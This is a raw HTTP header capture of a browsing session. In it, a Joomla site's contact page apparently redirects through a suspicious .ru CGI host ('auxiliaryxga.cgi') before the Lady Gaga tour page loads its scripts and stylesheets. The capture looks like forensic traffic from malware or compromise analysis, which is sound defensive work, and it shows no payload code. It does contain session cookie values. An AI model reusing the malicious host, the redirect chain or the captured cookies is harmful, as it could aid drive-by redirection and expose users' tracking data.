Server: Apache
Last-Modified: Tue, 26 Jun 2012 14:16:30 GMT
Etag: &quot;1e05ac-48361-4c360beab0b80&quot;
Accept-Ranges: bytes
Content-Length: 295777
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:18 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM; path=/
GET /livezilla/server.php?request=track&output=jcrpt&nse=0.5623297295730568 HTTP/1.1

Host: linaconstruction.net
GET /livezilla/server.php?request=track&amp;output=jcrpt&amp;nse=0.5623297295730568 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 403 Forbidden

Content-Type: text/html
Date: Tue, 06 Nov 2012 16:44:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:19 GMT
Connection: keep-alive
GET /backplane.js HTTP/1.1

Host: d134l0cdryxgwa.cloudfront.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.0 200 OK

Content-Type: text/javascript
Content-Length: 15289
Connection: keep-alive
Accept-Ranges: bytes
Date: Fri, 02 Nov 2012 22:28:52 GMT
EC2-instance-id: i-4f41e134
Etag: W/&quot;15289-1351865778000&quot;
Last-Modified: Fri, 02 Nov 2012 14:16:18 GMT
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Age: 76527
X-Amz-Cf-Id: iL-qYPcPUjPyUILGrBThhf2IHB-5-6ybYVYx7MMyi8fUT9s5GBF-Zw==
Via: 1.0 dc81da318a4ae20e51ccfd9463219596.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /templates/gk_gomuproject/favicon.ico HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Nov 2012 16:44:19 GMT
Server: Apache
Content-Length: 357
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /auxiliaryxga.cgi?8 HTTP/1.1

Host: disappointingtheproduct.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Tue, 06 Nov 2012 16:46:39 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Wed, 07-Nov-2012 16:46:39 GMT; path=/; domain=disappointingtheproduct.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET /bornthiswayball/images/tourheader.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 10 Apr 2012 21:44:28 GMT
Accept-Ranges: bytes
Etag: &quot;086a71a6317cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 1594
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/css/ALL.css HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Fri, 02 Nov 2012 17:51:54 GMT
Accept-Ranges: bytes
Etag: &quot;6abdb6be22b9cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 8043
Vary: Accept-Encoding
Cache-Control: private, max-age=62949
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/css/blueprint/screen.css HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Thu, 24 Mar 2011 23:54:30 GMT
Accept-Ranges: bytes
Etag: &quot;c42130d17eeacb1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 3507
Vary: Accept-Encoding
Cache-Control: private, max-age=63056
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/css/blueprint/print.css HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Thu, 30 Sep 2010 10:54:02 GMT
Accept-Ranges: bytes
Etag: &quot;01d8ca8d60cb1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 670
Vary: Accept-Encoding
Cache-Control: private, max-age=77208
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/library/SWFobject/swfobject.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Sat, 22 Apr 2006 08:27:30 GMT
Accept-Ranges: bytes
Etag: &quot;0c56098e665c61:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 2115
Vary: Accept-Encoding
Cache-Control: private, max-age=51455
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /assets/capture_client.js HTTP/1.1

Host: d7v0k4dt27zlp.cloudfront.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.0 200 OK

Content-Type: text/javascript
Content-Length: 575
Connection: keep-alive
x-amz-id-2: fBczSIhZj0nIvVAHUvCCd9s1QrER8AA5w1Y6nHHS1Ez1BiRIgi1EatGUK91qo41O
x-amz-request-id: F0CB215B177F984B
Date: Tue, 07 Aug 2012 22:27:31 GMT
Cache-Control: max-age=31557600
Content-Encoding: gzip
Last-Modified: Tue, 07 Aug 2012 22:20:23 GMT
Etag: &quot;a395389bb0d2ae17fd54ccf68a21da3b&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 7841810
X-Amz-Cf-Id: S32idHwp1O1O90xZN__R5s4DabEERIDIoEfgf5jOZBgz7G-Ks1xWpA==
Via: 1.0 9e6a829fab539aea0c15afd27fd9d1ad.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /web_assets/_global/js/IGA.linktagger.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 03 Aug 2011 04:33:02 GMT
Accept-Ranges: bytes
Etag: &quot;6928406e9651cc1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 824
Vary: Accept-Encoding
Cache-Control: private, max-age=15862
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /ark-metadata-css.js HTTP/1.1

Host: cdn.arktan.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.0 200 OK

Content-Type: text/javascript
Content-Length: 2043
Connection: keep-alive
x-amz-id-2: 21iRXBWRx3xSKzRgIQYgZy1FzMffUmZNngjrTbTroJqiEB7ItppujVx43O6T2QE+
x-amz-request-id: 8D2D342454AD1A65
Date: Sat, 06 Oct 2012 05:26:57 GMT
Last-Modified: Sun, 15 May 2011 17:00:19 GMT
Etag: &quot;5fb0eb8ade5b4c9e255c8dffae170d0f&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 67641
X-Amz-Cf-Id: iKFxSbIly1opTS3YmDT6B_Iu545MoE8i64JtJc3ccJDfuubfCUf8qA==
Via: 1.0 13581d7aed721f7c03ffea74b6e6901c.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /web_assets/_global/js/echo/iga-echo-script.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 27 Jan 2012 01:26:18 GMT
Accept-Ranges: bytes
Etag: &quot;c09b7dab92dccc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1268
Vary: Accept-Encoding
Cache-Control: private, max-age=8978
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /mxd3gmg.js HTTP/1.1

Host: use.typekit.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=utf-8
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Date: Tue, 06 Nov 2012 16:44:20 GMT
Last-Modified: Tue, 06 Nov 2012 16:39:58 GMT
Server: ECS (arn/46F9)
Status: 200 OK
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 9333
GET /web_assets/_global/js/echo/river.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 08 May 2012 18:25:25 GMT
Accept-Ranges: bytes
Etag: &quot;ecd710f0472dcd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 4156
Vary: Accept-Encoding
Cache-Control: private, max-age=47905
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/muxer.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 25 May 2011 01:43:26 GMT
Accept-Ranges: bytes
Etag: &quot;6cb7f247d1acc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 944
Vary: Accept-Encoding
Cache-Control: private, max-age=15418
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/forum/forum.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:36 GMT
Etag: 4854a743dcd20a348966ec8effb8a6d9
Vary: Accept-Encoding
X-Trans-Id: tx61e5784f90604396adf55e297645878d
X-Timestamp: 1349707116.51594
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 27 Sep 2012 19:27:22 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 1226
Cache-Control: public, max-age=383
Expires: Tue, 06 Nov 2012 16:50:43 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/ALL_min.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 23:30:43 GMT
Accept-Ranges: bytes
Etag: &quot;f952be29e9e8cb1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 7629
Vary: Accept-Encoding
Cache-Control: private, max-age=9095
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/forum.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Sat, 07 May 2011 00:25:01 GMT
Accept-Ranges: bytes
Etag: &quot;ea93b344dccc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 748
Vary: Accept-Encoding
Cache-Control: private, max-age=17913
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/blank-links.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 23:00:35 GMT
Accept-Ranges: bytes
Etag: &quot;50b0c225e856cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 572
Vary: Accept-Encoding
Cache-Control: private, max-age=47972
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /c/938/cc_af.js HTTP/1.1

Host: tags.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: max-age=86400
Date: Tue, 06 Nov 2012 16:44:20 GMT
Etag: &quot;abfe-4ca89beb97c80&quot;
Expires: Wed, 07 Nov 2012 16:44:20 GMT
Last-Modified: Tue, 25 Sep 2012 17:07:46 GMT
Server: ECS (arn/467E)
Vary: Accept-Encoding
X-Cache: HIT
X-Cnection: close
Content-Length: 10746
GET /images/favicon.ico HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Tue, 06 Nov 2012 16:44:20 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /web_assets/_global/js/echo/plugins/clear-after-body.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;f615e78b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 284
Vary: Accept-Encoding
Cache-Control: private, max-age=10868
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/enhanced-metadata.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 23 Jun 2011 23:47:31 GMT
Accept-Ranges: bytes
Etag: &quot;d0cfddeaff31cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 698
Vary: Accept-Encoding
Cache-Control: private, max-age=47775
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/jquery.qtip.min.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 19 Aug 2011 17:26:25 GMT
Accept-Ranges: bytes
Etag: &quot;7191b1f955ecc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 14661
Vary: Accept-Encoding
Cache-Control: private, max-age=50696
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:20 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /web_assets/_global/js/echo/plugins/filter-children.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;1c3cde8b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 840
Vary: Accept-Encoding
Cache-Control: private, max-age=63037
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/permalink.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:41:43 GMT
Accept-Ranges: bytes
Etag: &quot;a11cd55e86bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 449
Vary: Accept-Encoding
Cache-Control: private, max-age=16072
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/lmk-stream.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;8170e18b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1964
Vary: Accept-Encoding
Cache-Control: private, max-age=15920
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/inlinemedia.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
